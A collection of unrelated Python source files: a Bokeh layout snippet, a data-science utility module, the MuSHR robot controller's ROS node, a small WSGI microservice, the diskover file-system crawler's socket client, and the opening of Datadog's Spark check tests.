func_buttons.sizing_mode = 'stretch_width'
lay1 = column(ts_plots, name="ts_plots")
lay2 = column(func_buttons, p, name="map_div")
lay1.sizing_mode = 'stretch_width'
lay2.sizing_mode = 'stretch_both'
curdoc().add_root(lay1)
curdoc().add_root(lay2)
curdoc().title = "spaTScope"
|
_util.py
|
# instance.method = MethodType(method, instance)
# !aws codecommit list-repositories
# !autopep8 --in-place --aggressive --aggressive brac_dual_agent.py
# gpus = tf.config.experimental.list_physical_devices('GPU')
# if gpus:
# try:
# for gpu in gpus:
# tf.config.experimental.set_memory_growth(gpu, True)
# except RuntimeError as e:
# print(e)
#############################################################################
# %matplotlib inline
# !tar -czf data.tar.gz data
# !tar -czf code.tar.gz code
from inspect import getsource
from importlib import reload
from livelossplot import PlotLosses
import pytz
import tensorflow as tf
import silence_tensorflow.auto
# tz_NY = pytz.timezone('America/New_York')
# dt.now(tz_NY).strftime("%D:%H:%M:%S")
from typing import Dict, List, Set, Tuple
from datetime import datetime as dt
import itertools
import io
import sys
import gym
import ray
import warnings
warnings.simplefilter("ignore")
# from sagemaker import get_execution_role
# role = get_execution_role()
from IPython.display import clear_output
from tqdm import tqdm
# https://github.com/tqdm/tqdm
"""
pbar = tqdm(["a", "b", "c", "d"])
for char in pbar:
time.sleep(0.25)
pbar.set_description("Processing %s" % char)
for i in tqdm(range(10)):
"""
def smooth_loss(loss, freq):
loss = arr(loss).copy()
return np.mean(loss.reshape(-1, freq), axis = -1)
from types import MethodType
import functools
from functools import reduce
#############################################################################
# Packages
import scipy as sp
import pandas as pd
from pandas import DataFrame as DF
# import statsmodels.api as sm # !pip install statsmodels
from matplotlib.pyplot import hist
import pickle
from scipy.stats import truncnorm
import matplotlib.pyplot as plt
####################################
# Random
import random
from random import seed as rseed
from numpy.random import seed as npseed
from numpy import absolute as np_abs
from numpy.random import normal as rnorm
from numpy.random import uniform as runi
from numpy.random import binomial as rbin
from numpy.random import poisson as rpoisson
from numpy.random import shuffle,randn, permutation # randn(d1,d2) is d1*d2 i.i.d N(0,1)
from numpy import squeeze
from numpy.linalg import solve
####################################
# Numpy
import numpy as np
from numpy import mean, var, std, median
from numpy import array as arr
from numpy import sqrt, log, cos, sin, exp, dot, diag, ones, identity, zeros, roll, multiply, stack, concatenate, transpose
from numpy import concatenate as v_add
from numpy.linalg import norm, inv
from numpy import apply_along_axis as apply
from numpy.random import multinomial, choice
####################################
# sklearn
import sklearn as sk
from sklearn import preprocessing as pre
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error as mse
from sklearn.metrics import r2_score
from sklearn.linear_model import LinearRegression as lm
from sklearn.model_selection import KFold
from sklearn.model_selection import GridSearchCV
from scipy.special import softmax
#############################################################################
import os
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
np.set_printoptions(precision = 4)
#############################################################################
import time
now = time.time
import smtplib, ssl
import datetime, pytz
def EST():
return datetime.datetime.now().astimezone(pytz.timezone('US/Eastern')).strftime("%H:%M, %m/%d")
#############################################################################
dash = "--------------------------------------"
DASH = "\n" + "--------------------------------------" + "\n"
Dash = "\n" + dash
dasH = dash + "\n"
#############################################################################
#%% utility funs
from multiprocessing import Pool
import multiprocessing
n_cores = multiprocessing.cpu_count()
def mute():
sys.stdout = open(os.devnull, 'w')
def fun(f, q_in, q_out):
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs = multiprocessing.cpu_count(), **args):#-2
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
def g(x):
return f(x, **args)
proc = [multiprocessing.Process(target=fun, args=(g, q_in, q_out))
for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i, x in sorted(res)]
def setminus(A, B):
return [item for item in A if item not in B]
def listinlist2list(theList):
return [item for sublist in theList for item in sublist]
def if_exist(obj):
return obj in locals() or obj in globals()
def getSize(one_object):
print(one_object.memory_usage().sum() / 1024 ** 2, "MB")
# print(sys.getsizeof(one_object) // 1024, "MB")
def dump(file, path):
pickle.dump(file, open(path, "wb"))
def load(path):
return pickle.load(open(path, "rb"))
def get_MB(a):
MB = sys.getsizeof(a) / 1024 / 1024
return MB
def hstack_all_comb(array1, array2):
# array1 is on the left and also changes faster
res = np.hstack([
np.tile(array1, (array2.shape[0], 1))
, np.repeat(array2, array1.shape[0], axis=0)]
)
return res
def quantile(a, p):
r = [a[0] for a in DF(a).quantile(p).values]
return np.round(r, 3)
def flatten(l):
# list of sublist -> list
return [item for sublist in l for item in sublist]
def change_rate(old_targets, new_targets, numpy = False):
if numpy:
diff = np.mean(abs(new_targets-old_targets)) / (np.mean(abs(old_targets))+1e-6)
else:
diff = abs(new_targets-old_targets).mean() / (abs(old_targets).mean()+1e-6)
return min(1.0, diff)
#############################################################################
# pd.options.display.max_rows = 10
# with open('pred_columns.txt', 'w') as filehandle:
# k = 0
# for listitem in list(a):
# filehandle.write('{} {}\n'.format(k, listitem))
# k += 1
def print_all(dat, column_only = True):
if column_only:
with pd.option_context('display.max_columns', None): # more options can be specified also
print(dat)
else:
with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also
print(dat)
def quantile(a):
return np.percentile(a, range(0,110,10))
#############################################################################
def unzip(path, zip_type = "tar_gz"):
if zip_type == "tar_gz":
import tarfile
tar = tarfile.open(path, "r:gz")
tar.extractall()
tar.close()
elif zip_type == "zip":
from zipfile import ZipFile
with ZipFile(path, 'r') as zipObj:
# Extract all the contents of zip file in current directory
zipObj.extractall()
# import shutil
# total, used, free = shutil.disk_usage("/")
# print("Total: %d GiB" % (total // (2**30)))
# print("Used: %d GiB" % (used // (2**30)))
# print("Free: %d GiB" % (free // (2**30)))
#############################################################################
# !pip install termcolor
from termcolor import colored, cprint
# https://pypi.org/project/termcolor/#description
def printR(theStr):
print(colored(theStr, 'red'))
def printG(theStr):
print(colored(theStr, 'green'))
def printB(theStr):
print(colored(theStr, 'blue'))
def sets_intersection(d):
return list(reduce(set.intersection, [set(item) for item in d ]))
def select_each_row(array, idx):
return np.take_along_axis(array, idx[:,None], axis=1)
def subtract_each_column(mat, col):
return (mat.transpose() - col).transpose()
def sample_split(L, N):
""" replay buffer?
"""
kf = KFold(n_splits=L)
kf.get_n_splits(zeros(N))
split_ind = {}
k = 0
for i, j in kf.split(range(N)):
split_ind[k] = {"train_ind" : i, "test_ind" : j}
k += 1
return split_ind
def row_repeat(mat, rep, full_block = False):
if full_block:
return np.tile(mat, (rep, 1))
else:
return np.repeat(mat, rep, axis=0)
def SARS2traj(SARS, S_dim = 3):
states = arr([sars[0][:S_dim] for sars in SARS])
actions = arr([sars[1] for sars in SARS])
return states, actions
|
rhcnode.py
|
#!/usr/bin/env python
# Copyright (c) 2019, The Personal Robotics Lab, The MuSHR Team, The Contributors of MuSHR
# License: BSD 3-Clause. See LICENSE.md file in root directory.
import cProfile
import os
import signal
import threading
import rospy
from ackermann_msgs.msg import AckermannDriveStamped
from geometry_msgs.msg import Point, PoseStamped
from std_msgs.msg import ColorRGBA, Empty
from std_srvs.srv import Empty as SrvEmpty
from visualization_msgs.msg import Marker
import logger
import parameters
import rhcbase
import rhctensor
import utils
class RHCNode(rhcbase.RHCBase):
def __init__(self, dtype, params, logger, name):
rospy.init_node(name, anonymous=True, disable_signals=True)
super(RHCNode, self).__init__(dtype, params, logger)
self.reset_lock = threading.Lock()
self.inferred_pose_lock = threading.Lock()
self._inferred_pose = None
self.cur_rollout = self.cur_rollout_ip = None
self.traj_pub_lock = threading.Lock()
self.goal_event = threading.Event()
self.map_metadata_event = threading.Event()
self.ready_event = threading.Event()
self.events = [self.goal_event, self.map_metadata_event, self.ready_event]
self.run = True
self.do_profile = self.params.get_bool("profile", default=False)
self.NPOS = self.params.get_int("npos", default=3)
def start_profile(self):
if self.do_profile:
self.logger.warn("Running with profiling")
self.pr = cProfile.Profile()
self.pr.enable()
def end_profile(self):
if self.do_profile:
self.pr.disable()
self.pr.dump_stats(os.path.expanduser("~/mushr_rhc_stats.prof"))
def start(self):
self.logger.info("Starting RHController")
self.start_profile()
self.setup_pub_sub()
self.rhctrl = self.load_controller()
self.T = self.params.get_int("T")
self.ready_event.set()
rate = rospy.Rate(50)
self.logger.info("Initialized")
while not rospy.is_shutdown() and self.run:
ip = self.inferred_pose()
next_traj, rollout = self.run_loop(ip)
with self.traj_pub_lock:
if rollout is not None:
self.cur_rollout = rollout.clone()
self.cur_rollout_ip = ip
if next_traj is not None:
self.publish_traj(next_traj, rollout)
# For experiments. If the car is at the goal, notify the
# experiment tool
if self.rhctrl.at_goal(self.inferred_pose()):
self.expr_at_goal.publish(Empty())
self.goal_event.clear()
rate.sleep()
self.end_profile()
def run_loop(self, ip):
self.goal_event.wait()
if rospy.is_shutdown() or ip is None:
return None, None
with self.reset_lock:
# If a reset is initialed after the goal_event was set, the goal
# will be cleared. So we have to have another goal check here.
if not self.goal_event.is_set():
return None, None
if ip is not None:
return self.rhctrl.step(ip)
self.logger.err("Shouldn't get here: run_loop")
def shutdown(self, signum, frame):
rospy.signal_shutdown("SIGINT recieved")
self.run = False
for ev in self.events:
ev.set()
def setup_pub_sub(self):
rospy.Service("~reset/soft", SrvEmpty, self.srv_reset_soft)
rospy.Service("~reset/hard", SrvEmpty, self.srv_reset_hard)
rospy.Subscriber(
"/move_base_simple/goal", PoseStamped, self.cb_goal, queue_size=1
)
rospy.Subscriber(
rospy.get_param("~inferred_pose_t"),
PoseStamped,
self.cb_pose,
queue_size=10,
)
self.rp_ctrls = rospy.Publisher(
self.params.get_str(
"ctrl_topic", default="mux/ackermann_cmd_mux/input/navigation"
),
AckermannDriveStamped,
queue_size=2,
)
traj_chosen_t = self.params.get_str("traj_chosen_topic", default="~traj_chosen")
self.traj_chosen_pub = rospy.Publisher(traj_chosen_t, Marker, queue_size=10)
# For the experiment framework, need indicators to listen on
self.expr_at_goal = rospy.Publisher("/experiment_tool/finished", Empty, queue_size=1)
def srv_reset_hard(self, msg):
"""
Hard reset does a complete reload of the controller
"""
rospy.loginfo("Start hard reset")
self.reset_lock.acquire()
self.load_controller()
self.goal_event.clear()
self.reset_lock.release()
rospy.loginfo("End hard reset")
return []
def srv_reset_soft(self, msg):
"""
Soft reset only resets soft state (like tensors). No dependencies or maps
are reloaded
"""
rospy.loginfo("Start soft reset")
self.reset_lock.acquire()
self.rhctrl.reset()
self.goal_event.clear()
self.reset_lock.release()
rospy.loginfo("End soft reset")
return []
def cb_goal(self, msg):
goal = self.dtype(utils.rospose_to_posetup(msg.pose))
self.ready_event.wait()
if not self.rhctrl.set_goal(goal):
self.logger.err("That goal is unreachable, please choose another")
return
else:
self.logger.info("Goal set")
self.goal_event.set()
def cb_pose(self, msg):
self.set_inferred_pose(self.dtype(utils.rospose_to_posetup(msg.pose)))
if self.cur_rollout is not None and self.cur_rollout_ip is not None:
m = Marker()
m.header.frame_id = "map"
m.type = m.LINE_STRIP
m.action = m.ADD
with self.traj_pub_lock:
pts = (
self.cur_rollout[:, :2] - self.cur_rollout_ip[:2]
) + self.inferred_pose()[:2]
m.points = map(lambda xy: Point(x=xy[0], y=xy[1]), pts)
r, g, b = 0x36, 0xCD, 0xC4
m.colors = [ColorRGBA(r=r / 255.0, g=g / 255.0, b=b / 255.0, a=0.7)] * len(
m.points
)
m.scale.x = 0.05
self.traj_chosen_pub.publish(m)
def publish_traj(self, traj, rollout):
assert traj.size() == (self.T, 2)
ctrl = traj[0]
ctrlmsg = AckermannDriveStamped()
ctrlmsg.header.stamp = rospy.Time.now()
ctrlmsg.drive.speed = ctrl[0]
ctrlmsg.drive.steering_angle = ctrl[1]
self.rp_ctrls.publish(ctrlmsg)
def set_inferred_pose(self, ip):
with self.inferred_pose_lock:
self._inferred_pose = ip
def inferred_pose(self):
with self.inferred_pose_lock:
return self._inferred_pose
if __name__ == "__main__":
params = parameters.RosParams()
logger = logger.RosLog()
node = RHCNode(rhctensor.float_tensor(), params, logger, "rhcontroller")
signal.signal(signal.SIGINT, node.shutdown)
rhc = threading.Thread(target=node.start)
rhc.start()
# wait for a signal to shutdown
while node.run:
signal.pause()
rhc.join()
|
simple_microservice_after.py
|
# -*- coding: utf-8 -*-
from datetime import datetime
import io
import os.path
import time
import threading
from wsgiref.validate import validator
from wsgiref.simple_server import make_server
EXCHANGE_FILE = "./exchange.dat"
def update_exchange_file():
"""
Writes the current date and time every 10 seconds into the exchange file.
The file is created if it does not exist.
"""
print("Will update to exchange file")
while True:
with io.open(EXCHANGE_FILE, "w") as f:
f.write(datetime.now().isoformat())
time.sleep(10)
def simple_app(environ, start_response):
"""
Read the content of the exchange file and return it.
"""
if not os.path.exists(EXCHANGE_FILE):
start_response(
'503 Service Unavailable',
[('Content-type', 'text/plain')]
)
return [b'Exchange file is not ready']
start_response('200 OK', [('Content-type', 'text/plain')])
with io.open(EXCHANGE_FILE) as f:
return [f.read().encode('utf-8')]
if __name__ == '__main__':
t = threading.Thread(target=update_exchange_file)
t.start()
httpd = make_server('', 8080, simple_app)
print("Listening on port 8080....")
try:
httpd.serve_forever()
except KeyboardInterrupt:
httpd.shutdown()
t.join(timeout=1)
|
diskover-treewalk-client.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that index's
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
import os
import sys
import pickle
import socket
import time
import struct
from threading import Thread
try:
from Queue import Queue
except ImportError:
from queue import Queue
from optparse import OptionParser
from multiprocessing import cpu_count
version = '1.0.19'
__version__ = version
IS_PY3 = sys.version_info >= (3, 0)
if IS_PY3:
unicode = str
parser = OptionParser(version="diskover tree walk client v % s" % version)
parser.add_option("-p", "--proxyhost", metavar="HOST",
help="Hostname or IP of diskover proxy socket server")
parser.add_option("-P", "--port", metavar="PORT", default=9998, type=int,
help="Port for diskover proxy socket server (default: 9998)")
parser.add_option("-b", "--batchsize", metavar="BATCH_SIZE", default=50, type=int,
help="Batchsize (num of directories) to send to diskover proxy (default: 50)")
parser.add_option("-n", "--numconn", metavar="NUM_CONNECTIONS", default=5, type=int,
help="Number of tcp connections to use (default: 5)")
parser.add_option("-t", "--twmethod", metavar="TREEWALK_METHOD", default="scandir",
help="Tree walk method to use. Options are: oswalk, scandir, pscandir, metaspider (default: scandir)")
parser.add_option("-r", "--rootdirlocal", metavar="ROOTDIR_LOCAL",
help="Local path on storage to crawl from")
parser.add_option("-R", "--rootdirremote", metavar="ROOTDIR_REMOTE",
help="Mount point directory for diskover and bots that is same location as rootdirlocal")
parser.add_option("-T", "--pscandirthreads", metavar="NUM_SCANDIR_THREADS", default=cpu_count()*2, type=int,
help="Number of threads for pscandir treewalk method (default: cpu core count x 2)")
parser.add_option("-s", "--metaspiderthreads", metavar="NUM_SPIDERS", default=cpu_count()*2, type=int,
help="Number of threads for metaspider treewalk method (default: cpu core count x 2)")
parser.add_option("-e", "--excludeddir", metavar="EXCLUDED_DIR", default=['.snapshot','.zfs'], action="append",
help="Additional directory to exclude (default: .snapshot .zfs)")
(options, args) = parser.parse_args()
options = vars(options)
if not options['proxyhost'] or not options['rootdirlocal'] or not options['rootdirremote']:
parser.error("missing required options, use -h for help")
HOST = options['proxyhost']
PORT = options['port']
BATCH_SIZE = options['batchsize']
NUM_CONNECTIONS = options['numconn']
TREEWALK_METHOD = options['twmethod']
ROOTDIR_LOCAL = unicode(options['rootdirlocal'])
ROOTDIR_REMOTE = unicode(options['rootdirremote'])
# remove any trailing slash from paths
if ROOTDIR_LOCAL != '/':
ROOTDIR_LOCAL = ROOTDIR_LOCAL.rstrip(os.path.sep)
if ROOTDIR_REMOTE != '/':
ROOTDIR_REMOTE = ROOTDIR_REMOTE.rstrip(os.path.sep)
NUM_SPIDERS = options['metaspiderthreads']
NUM_SCANDIR_THREADS = options['pscandirthreads']
EXCLUDED_DIRS = options['excludeddir']
q = Queue()
connections = []
totaldirs = 0
def send_one_message(sock, data):
length = len(data)
try:
sock.sendall(struct.pack('!I', length))
sock.sendall(data)
except socket.error as e:
print("Exception connecting to diskover socket server caused by %s, trying again..." % e)
time.sleep(2)
send_one_message(sock, data)
def socket_worker(conn):
while True:
item = q.get()
send_one_message(conn, item)
q.task_done()
def spider_worker():
while True:
item = q_spider.get()
s = os.lstat(item)
mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime = s
blocks = s.st_blocks
q_spider_meta.put((item, (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime, blocks)))
q_spider.task_done()
def scandirwalk_worker():
dirs = []
nondirs = []
while True:
path = q_paths.get()
try:
for entry in scandir(path):
if entry.is_dir(follow_symlinks=False):
dirs.append(entry.name)
elif entry.is_file(follow_symlinks=False):
nondirs.append(entry.name)
q_paths_results.put((path, dirs[:], nondirs[:]))
except (OSError, IOError) as e:
print("OS/IO Exception caused by: %s" % e)
pass
except Exception as e:
print("Exception caused by: %s" % e)
pass
del dirs[:]
del nondirs[:]
q_paths.task_done()
def scandirwalk(path):
q_paths.put(path)
while True:
entry = q_paths_results.get()
root, dirs, nondirs = entry
# yield before recursion
yield root, dirs, nondirs
# recurse into subdirectories
for name in dirs:
new_path = os.path.join(root, name)
q_paths.put(new_path)
q_paths_results.task_done()
if q_paths_results.qsize() == 0 and q_paths.qsize() == 0:
time.sleep(.5)
if q_paths_results.qsize() == 0 and q_paths.qsize() == 0:
break
if __name__ == "__main__":
try:
banner = """\033[31m
__ __
/\ \ __ /\ \\
\_\ \/\_\ ____\ \ \/'\\ ___ __ __ __ _ __ //
/'_` \/\ \ /',__\\\ \ , < / __`\/\ \/\ \ /'__`\/\`'__\\ ('>
/\ \L\ \ \ \/\__, `\\\ \ \\\`\ /\ \L\ \ \ \_/ |/\ __/\ \ \/ /rr
\ \___,_\ \_\/\____/ \ \_\ \_\ \____/\ \___/ \ \____\\\ \\_\\ *\))_
\/__,_ /\/_/\/___/ \/_/\/_/\/___/ \/__/ \/____/ \\/_/
TCP Socket Treewalk Client v%s
https://shirosaidev.github.io/diskover
"It's time to see what lies beneath."
Support diskover on Patreon or PayPal :)\033[0m
""" % version
print(banner)
if TREEWALK_METHOD not in ["oswalk", "scandir", "pscandir", "metaspider"]:
print("Unknown treewalk method, methods are oswalk, scandir, pscandir, metaspider")
sys.exit(1)
starttime = time.time()
for i in range(NUM_CONNECTIONS):
try:
clientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
clientsock.connect((HOST, PORT))
except socket.error as e:
print("Exception connecting to diskover socket server caused by %s" % e)
sys.exit(1)
connections.append(clientsock)
print("thread %s connected to socket server %s" % (i, clientsock.getsockname()))
t = Thread(target=socket_worker, args=(clientsock,))
t.daemon = True
t.start()
print("Starting tree walk... (ctrl-c to stop)")
packet = []
if TREEWALK_METHOD in ["oswalk", "scandir"]:
if TREEWALK_METHOD == "scandir":
try:
from scandir import walk
except ImportError:
print("scandir python module not found")
sys.exit(1)
else:
from os import walk
timestamp = time.time()
dircount = 0
dirlist = []
filelist = []
for root, dirs, files in walk(ROOTDIR_LOCAL):
dircount += 1
totaldirs += 1
# check if directory excluded and delete subdirs and files to not recurse down tree
if os.path.basename(root) in EXCLUDED_DIRS:
del dirs[:]
del files[:]
continue
# check for symlinks
for d in dirs:
if not os.path.islink(os.path.join(root, d)):
dirlist.append(d)
for f in files:
if not os.path.islink(os.path.join(root, f)):
filelist.append(f)
root = root.replace(ROOTDIR_LOCAL, ROOTDIR_REMOTE)
packet.append((root, dirlist[:], filelist[:]))
if len(packet) >= BATCH_SIZE:
q.put(pickle.dumps(packet))
del packet[:]
if time.time() - timestamp >= 2:
elapsed = round(time.time() - timestamp, 3)
dirspersec = round(dircount / elapsed, 3)
print("walked %s directories in 2 seconds (%s dirs/sec)" % (dircount, dirspersec))
timestamp = time.time()
dircount = 0
del dirlist[:]
del filelist[:]
q.put(pickle.dumps(packet))
elif TREEWALK_METHOD == "pscandir":
# parallel scandir
try:
from scandir import scandir
except ImportError:
print("scandir python module not found")
sys.exit(1)
q_paths = Queue()
q_paths_results = Queue()
for i in range(NUM_SCANDIR_THREADS):
t = Thread(target=scandirwalk_worker)
t.daemon = True
t.start()
timestamp = time.time()
dircount = 0
for root, dirs, files in scandirwalk(ROOTDIR_LOCAL):
dircount += 1
totaldirs += 1
# check if directory excluded and delete subdirs and files to not recurse down tree
if os.path.basename(root) in EXCLUDED_DIRS:
del dirs[:]
del files[:]
continue
root = root.replace(ROOTDIR_LOCAL, ROOTDIR_REMOTE)
packet.append((root, dirs[:], files[:]))
if len(packet) >= BATCH_SIZE:
q.put(pickle.dumps(packet))
del packet[:]
if time.time() - timestamp >= 2:
elapsed = round(time.time() - timestamp, 3)
dirspersec = round(dircount / elapsed, 3)
print("walked %s directories in 2 seconds (%s dirs/sec)" % (dircount, dirspersec))
timestamp = time.time()
dircount = 0
q.put(pickle.dumps(packet))
elif TREEWALK_METHOD == "metaspider":
# use threads to collect meta and send to diskover proxy rather than
# the bots scraping the meta
try:
from scandir import scandir, walk
except ImportError:
print("scandir python module not found")
sys.exit(1)
q_spider = Queue()
q_spider_meta = Queue()
for i in range(NUM_SPIDERS):
t = Thread(target=spider_worker)
t.daemon = True
t.start()
timestamp = time.time()
dircount = 0
filemeta = []
for root, dirs, files in walk(ROOTDIR_LOCAL):
dircount += 1
totaldirs += 1
if os.path.basename(root) in EXCLUDED_DIRS:
del dirs[:]
del files[:]
continue
for f in files:
q_spider.put(os.path.join(root, f))
q_spider.join()
while q_spider_meta.qsize() > 0:
item = q_spider_meta.get()
filemeta.append(item)
q_spider_meta.task_done()
mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime = os.lstat(root)
root = root.replace(ROOTDIR_LOCAL, ROOTDIR_REMOTE)
packet.append(((root, (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime)), dirs[:], filemeta[:]))
if len(packet) >= BATCH_SIZE:
q.put(pickle.dumps(packet))
del packet[:]
if time.time() - timestamp >= 2:
elapsed = round(time.time() - timestamp, 3)
dirspersec = round(dircount / elapsed, 3)
print("walked %s directories in 2 seconds (%s dirs/sec)" % (dircount, dirspersec))
timestamp = time.time()
dircount = 0
del filemeta[:]
q.put(pickle.dumps(packet))
q.join()
elapsed = round(time.time() - starttime, 3)
dirspersec = round(totaldirs / elapsed, 3)
print("Finished tree walking, elapsed time %s sec, dirs walked %s (%s dirs/sec)" %
(elapsed, totaldirs, dirspersec))
for conn in connections:
print('closing connection', conn.getsockname())
conn.close()
# send kill signal to diskover proxy to trigger dir size updates
while True:
try:
print("sending shutdown signal to diskover proxy to start dir calcs...")
time.sleep(2)
clientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsock.connect((HOST, PORT))
send_one_message(clientsock, b'SIGKILL')
clientsock.close()
time.sleep(2)
clientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsock.connect((HOST, PORT))
send_one_message(clientsock, b'')
clientsock.close()
except socket.error:
print("diskover proxy received shutdown signal, exiting client")
sys.exit(0)
time.sleep(2)
except KeyboardInterrupt:
print("Ctrl-c keyboard interrupt, exiting...")
sys.exit(0)
|
test_spark.py
|
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import ssl
import threading
import time
import mock
import pytest
import urllib3
from requests import RequestException
from six import iteritems
from six.moves import BaseHTTPServer
from six.moves.urllib.parse import parse_qsl, unquote_plus, urlencode, urljoin, urlparse, urlunparse
from datadog_checks.dev.http import MockResponse
from datadog_checks.spark import SparkCheck
from .common import CLUSTER_NAME, CLUSTER_TAGS, INSTANCE_DRIVER_1, INSTANCE_DRIVER_2, INSTANCE_STANDALONE
# IDs
YARN_APP_ID = 'application_1459362484344_0011'
SPARK_APP_ID = 'app_001'
APP_NAME = 'PySparkShell'
# URLs for cluster managers
SPARK_APP_URL = 'http://localhost:4040'
SPARK_YARN_URL = 'http://localhost:8088'
SPARK_MESOS_URL = 'http://localhost:5050'
STANDALONE_URL = 'http://localhost:8080'
# SSL test server
SSL_SERVER_PORT = 44443
SSL_SERVER_ADDRESS = 'localhost'
SSL_SERVER_URL = 'https://{}:{}'.format(SSL_SERVER_ADDRESS, SSL_SERVER_PORT)
# URL Paths
SPARK_REST_PATH = 'api/v1/applications'
YARN_APPS_PATH = 'ws/v1/cluster/apps'
MESOS_APPS_PATH = 'frameworks'
STANDALONE_APPS_PATH = 'json/'
STANDALONE_APP_PATH_HTML = 'app/'
VERSION_PATH = '/api/v1/version'
# Service Check Names
SPARK_SERVICE_CHECK = 'spark.application_master.can_connect'
YARN_SERVICE_CHECK = 'spark.resource_manager.can_connect'
MESOS_SERVICE_CHECK = 'spark.mesos_master.can_connect'
SPARK_DRIVER_SERVICE_CHECK = 'spark.driver.can_connect'
STANDALONE_SERVICE_CHECK = 'spark.standalone_master.can_connect'
TEST_USERNAME = 'admin'
TEST_PASSWORD = 'password'
CUSTOM_TAGS = ['optional:tag1']
COMMON_TAGS = [
'app_name:' + APP_NAME,
] + CLUSTER_TAGS
def join_url_dir(url, *args):
"""
Join a URL with multiple directories
"""
for path in args:
url = url.rstrip('/') + '/'
url = urljoin(url, path.lstrip('/'))
return url
class Url(object):
"""A url object that can be compared with other url orbjects
without regard to the vagaries of encoding, escaping, and ordering
of parameters in query strings."""
def __init__(self, url):
parts = urlparse(url)
_query = frozenset(parse_qsl(parts.query))
_path = unquote_plus(parts.path)
parts = parts._replace(query=_query, path=_path)
self.parts = parts
def __eq__(self, other):
return self.parts == other.parts
def __hash__(self):
return hash(self.parts)
# PATH to Spark Version
VERSION_PATH = Url(urljoin(SPARK_APP_URL, VERSION_PATH))
# YARN Service URLs
YARN_APP_URL = Url(urljoin(SPARK_YARN_URL, YARN_APPS_PATH) + '?states=RUNNING&applicationTypes=SPARK')
YARN_SPARK_APP_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH))
YARN_SPARK_JOB_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
YARN_SPARK_STAGE_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
YARN_SPARK_EXECUTOR_URL = Url(
join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'executors')
)
YARN_SPARK_RDD_URL = Url(
join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd')
)
YARN_SPARK_STREAMING_STATISTICS_URL = Url(
join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics')
)
YARN_SPARK_METRICS_JSON_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, 'metrics/json'))
# Mesos Service URLs
MESOS_APP_URL = Url(urljoin(SPARK_MESOS_URL, MESOS_APPS_PATH))
MESOS_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
MESOS_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
MESOS_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
MESOS_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
MESOS_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
MESOS_SPARK_STREAMING_STATISTICS_URL = Url(
join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics')
)
MESOS_SPARK_METRICS_JSON_URL = Url(join_url_dir(SPARK_APP_URL, 'metrics/json'))
# Driver Service URLs
DRIVER_APP_URL = Url(urljoin(SPARK_APP_URL, SPARK_REST_PATH))
DRIVER_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
DRIVER_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
DRIVER_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
DRIVER_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
DRIVER_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
DRIVER_SPARK_STREAMING_STATISTICS_URL = Url(
join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics')
)
DRIVER_SPARK_METRICS_JSON_URL = Url(join_url_dir(SPARK_APP_URL, 'metrics/json'))
# Spark Standalone Service URLs
STANDALONE_APP_URL = Url(urljoin(STANDALONE_URL, STANDALONE_APPS_PATH))
STANDALONE_APP_HTML_URL = Url(urljoin(STANDALONE_URL, STANDALONE_APP_PATH_HTML) + '?appId=' + SPARK_APP_ID)
